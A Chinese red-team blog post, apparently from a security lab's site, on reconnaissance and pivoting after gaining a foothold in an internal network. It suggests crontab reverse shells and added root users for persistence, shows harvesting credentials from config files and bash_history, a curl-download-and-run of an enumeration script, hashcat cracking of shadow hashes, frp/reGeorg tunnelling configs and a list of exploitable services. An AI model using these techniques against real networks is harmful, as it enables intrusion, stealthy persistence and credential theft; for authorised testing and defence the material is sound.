<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="本站由哨兵安全实验室支持创办">

<link rel="shortcut icon" href="/assets/img/favicon.png">
<link type="application/atom+xml" rel="alternate" href="/feed.xml" title="©「哨兵」| Sentry Security" />



<!-- Open Graph metadata -->
<meta property="og:type" content="website" />
<meta property="og:title" content="「信息搜集」:漫谈一些在内网的信息搜集技巧 | ©「哨兵」| Sentry Security" />
<meta property="og:description" content="本站由哨兵安全实验室支持创办" />
<meta property="og:image" content="http://localhost:80/assets/img/logo-share.png" /> <!-- WeChat requires that thumbnail image is larger than 300x300 -->
<meta property="og:url" content="http://localhost:80/blog/2020/walkthrough/insideNet/" />
<title> 「信息搜集」:漫谈一些在内网的信息搜集技巧 | ©「哨兵」| Sentry Security | Sentrylab</title>

<link rel="stylesheet" type="text/css" href="/assets/css/pace-minimal.css">
<script src="/assets/js/pace.min.js"></script>


<!-- Bootstrap core CSS -->
<link href="/assets/css/bootstrap.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/assets/css/style.css" rel="stylesheet">
<link href="/assets/css/font-awesome.min.css" rel="stylesheet">
<link href="/assets/css/font-awesome-v4-shims.min.css" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/404-style.css">


<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/bootstrap.min.js"></script>




</head>


    <body>
        <!-- Fixed navbar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/"><!--
   --><picture>
  <source srcset="/assets/img/logo-small-dark.png 1x, /assets/img/logo-small-dark@2x.png 2x, /assets/img/logo-small-dark@3x.png 3x, /assets/img/logo-small-dark@4x.png 4x" media="(prefers-color-scheme: dark)" />
  
  <img src="/assets/img/logo-small.jpg" srcset="/assets/img/logo-small.png 1x, /assets/img/logo-small@2x.png 2x, /assets/img/logo-small@3x.png 3x, /assets/img/logo-small@4x.png 4x" />
  </picture> Sentrylab</a>
    </div>
    <div class="navbar-collapse collapse navbar-right">
      <ul class="nav navbar-nav">
        <li ><a href="/">HOME</a></li>
        <li class="active"><a href="/blog/">BLOG</a></li>
        <li ><a href="/events/">EVENTS</a></li>
        <li ><a href="/categories/">CATEGORIES</a></li>
        <li ><a href="/daily/">DAILY</a></li>
        <li><a href="https://about.sentrylab.cn">ABOUT ME</a></li>
      </ul>
    </div><!--/.nav-collapse -->

  </div>
</div>

            <div class="container mtb">
    <div class="row">
        <!-- SINGLE POST -->
        <div class="col-lg-8">
            <!-- Blog Post  -->
            <a href="/blog/2020/walkthrough/insideNet/"><h3 class="ctitle">「信息搜集」:漫谈一些在内网的信息搜集技巧</h3></a>
            <p><csmall>Jun 8, 2020. |  Last edited: Mar 19, 2021. |  By: Bin4xin.</csmall></p>
            <div class="post-content"> 
            <p>经历过几次HW行动，每次HW都运气较好可以拿到服务器，于是每次公司的内网渗透的任务就交给我，记录一下对于内网的信息搜集过程，以及在此过程中我自己所积累的小技巧。</p>

<hr />
<p><strong>2021年 3月19日 星期五 16时37分27秒 CST</strong>更新</p>
<ul>
  <li>重构了部分小结的展示：
    <ul>
      <li>重新调整了文章的阐述框架，尽可能从实战角度出发，进行章节安排；</li>
      <li>尽量使得前后小结更加紧凑，阐述逻辑更加清晰。</li>
    </ul>
  </li>
  <li>加入了尽可能多的markdown语法，文章结构清晰的同时，让页面更加赏心悦目。</li>
</ul>

<blockquote>
  <p>写在文前：</p>

  <p>年后回来就一直在肝代码，肝的快失去信心了；正好三月中旬有场全国范围的攻防演练，就来重新拾起信心～演练结束再肝代码再失去信心，循环往复=。=</p>

  <p>本文着重从实战角度作为切入点，从获取的跳板机为入口进行阐述，基本的逻辑为：</p>

  <p>跳板机-&gt;内网代理-&gt;信息搜集-&gt;漏洞挖掘与利用</p>
</blockquote>

<p>我们从攻击者的角度来看，拿到一个跳板机的权限后首先是对跳板机所在的区域进行路由划分，我们可以通过这样的思路来判断获得内网中搜集到的信息是否利于我们进一步渗透，同时我们在此过程中也需要小心谨慎，攻防演练中我所遇到的基本上都是生产环境，在和开发、运维人员博弈的过程中要做到：
<strong>悄悄地来、悄悄的走</strong></p>

<p>废话不多说，文笔较菜，文章权当抛砖引玉，回到正题。</p>
<h2 id="零在机器上的信息搜集">零：在机器上的信息搜集</h2>

<blockquote>
  <p>渗透的本质就是信息搜集</p>
</blockquote>

<h3 id="0x01个人工作机器信息搜集">0x01：个人工作机器信息搜集</h3>
<p>这方面我本人了解的不是很多，一般来说是通过钓鱼邮件的形式获取的WINDOWS PC权限，可以参考我另一篇从网上的搬运过来的文章：</p>

<ul>
  <li><a href="https://juejin.cn/post/6881208971915444231#heading-3">个人机器信息收集</a></li>
</ul>

<h3 id="0x02web服务器信息搜集">0x02：WEB服务器信息搜集</h3>
<p>一般建议可以以root用户新建用户来维持权限，或者是写入<code class="language-plaintext highlighter-rouge">corntab</code>计划来定时反弹shell。实操中几乎很少有运维、开发去检查定时计划的反弹shell脚本，所以基本上可以满足后持续渗透的条件。</p>
<h4 id="-配置文件"># 配置文件</h4>

<ul>
  <li>数据库配置信息
通过mybatis等配置文件就可以拿到内网中对应的数据库机器，一般都是低权限，运气好可以拿到高权限。运气再好一点存在高权限的mssql数据库可以尝试连接一下尝试<code class="language-plaintext highlighter-rouge">xp_cmd_shell</code>来执行命令。</li>
</ul>

<p>我们通过web层面拿到的机器，一般都是web服务器，即存在各种jar包，所以服务器里会存放大量配置文件</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>在当前目录下搜索存在字符为<span class="s1">'mysql'</span>的文件
<span class="nb">grep</span> <span class="nt">-rn</span> <span class="s2">"mysql"</span> <span class="nb">.</span>
<span class="o">=======</span>
查看对应系统的敏感配置文件
<span class="nb">cat </span>static/scripts/tinymce/js/tinymce/plugins/jbimages/ci/application/config/database.php
<span class="o">=======</span>
curl ifconfig.me
120.25.13.49
</code></pre></div></div>
<p>通过进程任务可以查找到部署jar包的目录和相对应依赖，大部分运维和开发都习惯于在根目录下新建data目录或者是非系统文件夹下的目录存在web的依赖jar包，我们就可以从这点做突破口。查看一下端口开放情况和对应的目录位置，有一些shell的基础就可以搜集到这些信息。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ps <span class="nt">-ef</span>|grep java

netstat <span class="nt">-ANTUP</span>
</code></pre></div></div>

<blockquote>
  <p><strong>有的时候拿到的机器或多或少存在一些特殊情况，比如docker机器、单纯的一个数据库机器，那么就尽力而为去做一些搜集工作，特别是docker机器，除了跑的服务，机器里面太干净了，基本没有什么可以利用的地方。</strong></p>
</blockquote>

<h4 id="-bash_history"># bash_history</h4>

<p>命令执行历史文件一般建议必看，里面会存着一些意想不到的内容，下面截取一小部分我在内网实战中发现的惊喜：</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd </span>nexus-3.12.0-01
ll
<span class="nb">cd </span>bin/
./nexus start
pactera@575
<span class="nb">cd </span>domain/
ll
<span class="nb">cd </span>nexus3/
</code></pre></div></div>
<p>注意<code class="language-plaintext highlighter-rouge">./nexus start</code>和<code class="language-plaintext highlighter-rouge">cd domain/</code>两条命令中间的那个“命令”，对，没错那个是sudoer用户的密码，su切换直接就拥有root权限。我们分析一下为什么出现这样的现象：个人认为是在运行nexus程序是需要密码来提升权限，然后输入者在等待过程中没有发现输入密码的shell还没有回显出来就输入了密码，从而导致密码被系统当作执行命令记录进了history文件。</p>

<hr />
<p><strong>发现这个后，我第一时间去看了自己服务器和自己的mac本上的历史文件，搜索机器密码关键词，同时也存在这样的现象明文密码存在了里面</strong></p>

<p><strong>醍醐灌顶</strong></p>
<h4 id="-一些自动化搜集脚本"># 一些自动化搜集脚本</h4>

<ul>
  <li>LinEnum.sh
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-o</span> /tmp/linenum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<span class="nb">chmod</span> +X /tmp/linenum.sh <span class="o">&amp;&amp;</span> bash /tmp/linenum.sh
</code></pre></div>    </div>
  </li>
</ul>

<h4 id="-passwdshadow不推荐"># Passwd&amp;Shadow（不推荐）</h4>

<p>一般来说通过<code class="language-plaintext highlighter-rouge">shiro</code>和<code class="language-plaintext highlighter-rouge">struts2</code>拿到的shell基本都是root，很多人都会直接去读取passwd文件，其实并不可取。下面展示一下2核4G服务器跑hash文件的过程。一般是跑不出来的，哈希不可逆，除非存在彩虹表，一般都跑不出来。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hashcat <span class="nt">-m</span> 1800 <span class="nt">-a</span> 0 <span class="nt">-o</span> found.txt linux-root.txt /usr/share/john/password.lst <span class="nt">--force</span>
hashcat <span class="o">(</span>v4.0.1<span class="o">)</span> starting...

OpenCL Platform <span class="c">#1: The pocl project</span>
<span class="o">====================================</span>
<span class="k">*</span> Device <span class="c">#1: pthread-Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz, 256/738 MB allocatable, 1MCU</span>

Hashes: 2 digests<span class="p">;</span> 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
<span class="k">*</span> Zero-Byte
<span class="k">*</span> Uses-64-Bit

Password length minimum: 0
Password length maximum: 256

ATTENTION! Pure <span class="o">(</span>unoptimized<span class="o">)</span> OpenCL kernels selected.
This enables cracking passwords and salts <span class="o">&gt;</span> length 32 but <span class="k">for </span>the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append <span class="nt">-O</span> to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

<span class="k">*</span> Device <span class="c">#1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'</span>
<span class="k">*</span> Device <span class="c">#1: Kernel m01800.8f866878.kernel not found in cache! Building may take a while...</span>

</code></pre></div></div>
<p>继续 :(</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>s]tatus <span class="o">[</span>p]ause <span class="o">[</span>r]esume <span class="o">[</span>b]ypass <span class="o">[</span>c]heckpoint <span class="o">[</span>q]uit <span class="o">=&gt;</span> Dictionary cache built:
<span class="k">*</span> Filename..: /usr/share/john/password.lst
<span class="k">*</span> Passwords.: 3559
<span class="k">*</span> Bytes.....: 26325
<span class="k">*</span> Keyspace..: 3559
<span class="k">*</span> Runtime...: 0 secs

- Device <span class="c">#1: autotuned kernel-accel to 128</span>
- Device <span class="c">#1: autotuned kernel-loops to 128</span>
<span class="o">[</span>s]tatus <span class="o">[</span>p]ause <span class="o">[</span>r]esume <span class="o">[</span>b]ypass <span class="o">[</span>c]heckpoint <span class="o">[</span>q]uit <span class="o">=&gt;</span> <span class="o">[</span>s]tatus <span class="o">[</span>p]ause <span class="o">[</span>r]esume <span class="o">[</span>b]ypass <span class="o">[</span>c]heckpoApproaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha512crypt <span class="nv">$6$,</span> SHA512 <span class="o">(</span>Unix<span class="o">)</span>
Hash.Target......: linux-root.txt
Time.Started.....: Mon Jun  8 11:29:25 2020 <span class="o">(</span>23 secs<span class="o">)</span>
Time.Estimated...: Mon Jun  8 11:29:48 2020 <span class="o">(</span>0 secs<span class="o">)</span>
Guess.Base.......: File <span class="o">(</span>/usr/share/john/password.lst<span class="o">)</span>
Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span>
Speed.Dev.#1.....:      311 H/s <span class="o">(</span>8.82ms<span class="o">)</span>
Recovered........: 0/2 <span class="o">(</span>0.00%<span class="o">)</span> Digests, 0/2 <span class="o">(</span>0.00%<span class="o">)</span> Salts
Progress.........: 7118/7118 <span class="o">(</span>100.00%<span class="o">)</span>
Rejected.........: 0/7118 <span class="o">(</span>0.00%<span class="o">)</span>
Restore.Point....: 3559/3559 <span class="o">(</span>100.00%<span class="o">)</span>
Candidates.#1....: doom2 -&gt; sss
HWMon.Dev.#1.....: N/A

Started: Mon Jun  8 11:28:50 2020
Stopped: Mon Jun  8 11:29:49 2020
</code></pre></div></div>

<h3 id="0x03运维机器信息搜集">0x03：运维机器信息搜集</h3>

<p>头脑风暴中…（没有遇到，有再更新）</p>
<ul>
  <li>密码复用</li>
  <li>常见运维平台及服务的漏洞利用
    <ul>
      <li>zabbix agent</li>
      <li>堡垒机</li>
      <li>…</li>
    </ul>
  </li>
</ul>

<h2 id="一局域网里的信息搜集">一：局域网里的信息搜集</h2>

<h3 id="1x01跳板机攻击">1x01：跳板机攻击</h3>
<p>这一小节提出的意思是：跳板机上的<code class="language-plaintext highlighter-rouge">公网暴露</code>和<code class="language-plaintext highlighter-rouge">内网暴露</code>。
如：</p>
<ul>
  <li>各种数据库 mysql、oracle、postgresql仅内网开放</li>
  <li>区别在于：<code class="language-plaintext highlighter-rouge">bind addr</code> = <code class="language-plaintext highlighter-rouge">0.0.0.0 or 127.0.0.1</code></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nmap scan report <span class="k">for</span> <span class="o">(</span>inside_ip_addr<span class="o">)</span>

20893/tcp open  textui       Alibaba Dubbo remoting telnetd
</code></pre></div></div>
<p>显而易见，内网里的Dubbo，反序列化走一波。</p>

<h3 id="1x02内网代理">1x02：内网代理</h3>

<p>内网代理，顾名思义就是我们自己可控的本机，通过各种代理方法（s5、s4），把拿下的内网服务器当作流量转发的一个中间跳板，对内网进行一系列我们想做的事情。这种情况下，我们的代理机器在内网没有具体的一个身份，只是我们通过代理的方式把我们对内网所发出的流量通过内网可控服务器向内网进行请求。</p>

<p>极力推荐。挂了代理就已经进入了内网，十分方便。只需要配置vps（frps）端，拿下shell后下载frpc客户端，启动服务就可以。下面顺便贴上server端和client端的配置文件:</p>

<ul>
  <li><strong>frp server:</strong></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>frp/frps.ini 
<span class="o">[</span>common]
<span class="c"># vps代理TCP监听端口</span>
bind_port <span class="o">=</span> 7000

<span class="c"># 授权码，请改成更复杂的</span>
token <span class="o">=</span> <span class="o">{</span>your token<span class="o">}</span>

<span class="c"># frp管理后台端口，请按自己需求更改</span>
dashboard_port <span class="o">=</span> 7500
<span class="c"># frp管理后台用户名和密码，请改成自己的</span>
dashboard_user <span class="o">=</span> <span class="o">{</span>your admin username<span class="o">}</span>
dashboard_pwd <span class="o">=</span> <span class="o">{</span>your admin password<span class="o">}</span>
enable_prometheus <span class="o">=</span> <span class="nb">true</span>

<span class="c"># frp日志配置</span>
log_file <span class="o">=</span> /var/log/frps.log
log_level <span class="o">=</span> info
log_max_days <span class="o">=</span> 3

<span class="c">#启动vps frps端</span>
<span class="nv">$ </span>./frps <span class="nt">-c</span> frps.ini
</code></pre></div></div>
<ul>
  <li><strong>frp clients（被代理客户端，可以称为跳板机）:</strong></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>s5_jsccs.ini 
<span class="o">[</span>common]
server_addr <span class="o">=</span> <span class="o">{</span>your vps ip<span class="o">}</span>
server_port <span class="o">=</span> 7000
<span class="nv">token</span><span class="o">=</span> <span class="o">{</span>your token<span class="o">}</span>

<span class="c">#此处可以自定义标签-dashboard面板proxies父栏对应的name={target}，{target}示例：s5_in_JStelecom</span>
<span class="o">[{</span>target<span class="o">}]</span>
<span class="nb">type</span> <span class="o">=</span> tcp
remote_port <span class="o">=</span> 10010
plugin <span class="o">=</span> socks5
plugin_user <span class="o">=</span> <span class="o">{</span>your connect username<span class="o">}</span>
plugin_passwd <span class="o">=</span> <span class="o">{</span>your connect password<span class="o">}</span>
use_encryption <span class="o">=</span> <span class="nb">true
</span>use_compression <span class="o">=</span> <span class="nb">true</span>
</code></pre></div></div>

<ul>
  <li><strong>client（代理进内网客户端，可以称为攻击机器）</strong>
    <ul>
      <li>1.proxifier（支持mac、windows）配置自定义：
        <ul>
          <li>server_addr = {your vps ip}</li>
          <li>server_port = 7000</li>
          <li>plugin = socks5</li>
          <li>plugin_user = {your connect username}</li>
          <li>plugin_passwd = {your connect password}</li>
        </ul>
      </li>
      <li>2.proxychains4 (linux、mac)配置<code class="language-plaintext highlighter-rouge">/etc/proxychains.conf</code>文件：
        <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="o">[</span>ProxyList]
  <span class="c"># add proxy here ...</span>
  <span class="c"># meanwile</span>
  <span class="c"># defaults set to "tor"</span>
  <span class="c"># socks4        127.0.0.1 9050</span>

  <span class="c">#socks5 127.0.0.1 1081</span>
  socks5  <span class="o">{</span>your vps ip<span class="o">}</span>   <span class="o">{</span>your vps port<span class="o">}</span>    <span class="o">{</span>your connect username<span class="o">}</span>   <span class="o">{</span>your connect password<span class="o">}</span>
  <span class="c"># burp suite proxy</span>
  <span class="c">#http 127.0.0.1 12344</span>
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
</ul>

<p>应用即可。<code class="language-plaintext highlighter-rouge">proxychains4 curl http://{target.ip}:{target.port}/</code>命令进行内网访问，一般可以通过命令行进行海德拉批量口令爆破，若需GUI进行浏览器访问可使用<code class="language-plaintext highlighter-rouge">proxifier</code>进行全局代理进行web访问。</p>

<h3 id="1x03内网穿透">1x03：内网穿透</h3>

<p>在写之前我们需要明确一点，就是我们所需要的内网目标是什么？
而内网穿透和内网代理的分别在哪里？
在什么情况我们需要做内网穿透，什么时候我们需要做内网代理？</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 reGeorgSocksProxy.py <span class="nt">-p</span> 9999 <span class="nt">-l</span> 0.0.0.0 <span class="nt">-u</span> https://www.pgyer.com/tunnel.nosocket.php
</code></pre></div></div>

<p>内网穿透就是针对一个机器下的某一个特定端口，通过流量转发的形式把端口暴露在公网上，举个例子，我们拿下了一个linux机器，很巧这个机器是运维机器，我们发现了大量的运维账号密码。
又然后，发现windows的远程登录服务即3389端口，所以我们在这个时候可以使用端口服务转发的技巧，把端口流量转发到一个我们可控公网的端口上（如33890），那么我们在对我们自己可控公网的端口上进行数据请求的时候，就是在对这个windows机器的数据请求，所以我们可以很轻松的使用我们的到的账号和密码来连接对应的windows机器。</p>

<p>所以我们做内网穿透的最终目的，很显然是：
我们在已知某个内网服务器的敏感信息（如3389远程连接账号密码、3306连接账号密码），而我们在内网又无法使用windows机器远程连接、mysql-client软件对我们所得到的信息进行明确验证时，那么这个时候我们可以使用内网穿透即流量转发的手段来进行进一步验证。</p>

<h3 id="1x04内网信息搜集技巧">1x04：内网信息搜集技巧</h3>
<h4 id="-nmap"># nmap</h4>
<p>由此拿到web服务器的权限后，msf死活都连不上，就无法进行内网扫描，查资料后可以：</p>

<ul>
  <li>跳板机（非root权限）本地编译安装nmap：</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget https://nmap.org/dist/nmap-7.40.tar.bz2
bzip2 <span class="nt">-cd</span> nmap-7.40.tar.bz2 | <span class="nb">tar </span>xvf -
<span class="nb">cd </span>nmap-7.40
./configure
<span class="nb">echo</span> <span class="nv">$?</span>
make <span class="o">&amp;&amp;</span> make <span class="nb">install
</span>noohup ./nmap <span class="nt">-p-</span> <span class="nt">-T4</span> <span class="nt">-A</span> 192.168.0.0/24 &amp;
</code></pre></div></div>

<ul>
  <li>Cobalt Strike 插件扫描</li>
</ul>

<h2 id="二典型案例剖析">二：典型案例剖析</h2>

<ul>
  <li>Elastic Search
    <ul>
      <li>RCE</li>
      <li>敏感信息</li>
      <li>nday…</li>
    </ul>
  </li>
  <li>Zabbix
    <ul>
      <li>弱口令</li>
      <li>SQL注入</li>
      <li>nday…</li>
    </ul>
  </li>
  <li>ActiveMQ
    <ul>
      <li>basic认证弱口令</li>
      <li>ActiveMQ 反序列化漏洞（CVE-2015-5254）</li>
      <li>PUT &amp; MOVE方法写入shell</li>
    </ul>
  </li>
  <li>Hystrix
    <ul>
      <li>ssrf
        <ul>
          <li>http://ip:6855/proxy.stream?origin=http://www.baidu.com</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>redis
    <ul>
      <li>未授权写入crontab计划</li>
    </ul>
  </li>
  <li>shiro
    <ul>
      <li>shiro550 &amp; 721 rememberMe反序列化</li>
    </ul>
  </li>
  <li>struts2
    <ul>
      <li>s2-{01-61}</li>
    </ul>
  </li>
  <li>…
其实总结下来内网里有很多可以利用的，还是要具体问题具体分析才能更好的在内网“遨游”。</li>
</ul>

<h2 id="总结">总结</h2>

<p><strong>总结下来，内网的信息收集需要的是细心。</strong></p>

<h2 id="参考">参考</h2>

<ul>
  <li><a href="https://apt404.github.io/2016/06/26/atived-machine-discovnery/">如何在目标内网中发现更多存活主机 [Arp,icmp,tcp/udp,smb,snmp …]</a></li>
</ul>

<p>以上。</p>

            </div>
            <div class="spacing"></div>
            <div>
	<div class="hline"></div>
	<h3><em>#</em> 申明</h3>
	<div class="spacing"></div>
	<h4><em>By: Bin4xin.</em></h4>
	<h4>转载请申明本文链接：<a href="/blog/2020/walkthrough/insideNet/" target="_blank"> 「信息搜集」:漫谈一些在内网的信息搜集技巧</a></h4>

	<h3><em># Any Questions</em></h3>
	<div class="spacing"></div>
	<h4> >_ 对本文进行提问：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://github.com/Bin4xin/bin4xin.github.io/blob/1b4fffa6232dc6ffa2cece8be0d6c39e0c5f9cfe/blog/2020/walkthrough/insideNet/index.html%23L84" target="_blank"> <em><li class="fa fa-github"></li> Reference in new issue.</em></a></h4>

	<h4> >_ 对本文进行留言：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://bin4xin.github.io/blog/2020/walkthrough/insideNet/" target="_blank"> <em><li class="fa fa-github"></li> Leave a Comment.</em></a></h4>
	<div class="spacing"></div>
</div>
        </div><!--/col-lg-8 -->
        
        <div class="col-lg-3">
    <h4>Subscribe/订阅</h4>
    <div class="hline"></div>
        <p>
        <p class="rss-subscribe"><i class="fa fa-rss"></i> Subscribe to this blog <a href="/feed.xml">via RSS</a>.</p>
        </p>
    <div class="spacing"></div>
    <h4>Categories/分类目录</h4>
    <div class="hline"></div>
        
        <div class="post-meta mb-3">
        <div class="spacing"></div>
<!--          <i class="far fa-folder-open fa-fw mr-1"></i>-->
<!--          -->
<!--            <a href='/blog/'>blog</a>-->
<!---->
<!--          -->
<!--            <a href='/vulnhub/'>vulnhub</a>-->
<!---->
<!--          -->
<!--            <a href='/%E5%86%85%E7%BD%91/'>内网</a>-->
<!---->
<!--          -->
<!--            <a href='/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/'>信息搜集</a>-->
<!---->
<!--          -->
            <details>
                <summary class="point">本文分类</summary>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/blog/'>blog</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/vulnhub/'>vulnhub</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E5%86%85%E7%BD%91/'>内网</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/'>信息搜集</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
            </details>
        </div>
        
        <p>
    <details>
        <summary class="point">所有标签/数量</summary>
        
        <p>
            <i class="fa fa-angle-right"></i> Web
            <span class="badge badge-theme pull-right">11</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 漏洞复现
            <span class="badge badge-theme pull-right">9</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 渗透
            <span class="badge badge-theme pull-right">8</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 安全工具
            <span class="badge badge-theme pull-right">5</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 笔记
            <span class="badge badge-theme pull-right">32</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 软件移植
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Arm
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 主动防御
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 技巧
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Android reverse
            <span class="badge badge-theme pull-right">4</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 排错
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Waf
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Maven
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Python
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Terminal
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Docker
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Cve
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Sql-inject
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Bash
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 内网
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 信息搜集
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Fuzz
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Src
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Daily
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
    </details>
    <div class="spacing"></div>

    <h4>Tags/标签</h4>
    <div class="hline"></div>
    <p>
        
            <a class="btn btn-theme" href='/' role="button">Web (11)</a>
        
            <a class="btn btn-theme" href='/' role="button">漏洞复现 (9)</a>
        
            <a class="btn btn-theme" href='/' role="button">渗透 (8)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">安全工具 (5)</a>
        
            <a class="btn btn-theme" href='/' role="button">笔记 (32)</a>
        
            <a class="btn btn-theme" href='/' role="button">软件移植 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">Arm (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">主动防御 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">技巧 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Android reverse (4)</a>
        
            <a class="btn btn-theme" href='/' role="button">排错 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Waf (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Maven (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Python (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Terminal (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Docker (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Cve (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Sql-inject (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Bash (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">内网 (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">信息搜集 (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">Fuzz (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Src (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Daily (2)</a>
        
    </p>
    <div class="spacing"></div>

    <h4>Article Directory/文章目录</h4>
    <div class="hline"></div>
    <p>
        <ul id="toc" class="section-nav">
<li class="toc-entry toc-h2"><a href="#零在机器上的信息搜集">零：在机器上的信息搜集</a>
<ul>
<li class="toc-entry toc-h3"><a href="#0x01个人工作机器信息搜集">0x01：个人工作机器信息搜集</a></li>
<li class="toc-entry toc-h3"><a href="#0x02web服务器信息搜集">0x02：WEB服务器信息搜集</a>
